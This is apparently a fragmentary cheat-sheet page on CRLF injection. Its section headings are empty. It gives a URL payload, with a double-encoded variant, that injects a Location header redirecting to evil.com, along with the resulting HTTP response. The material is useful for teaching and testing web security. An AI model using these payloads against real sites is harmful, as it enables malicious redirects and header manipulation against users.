CRLF Injection
Introduction
Where to find
How to exploit
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/References
Last updated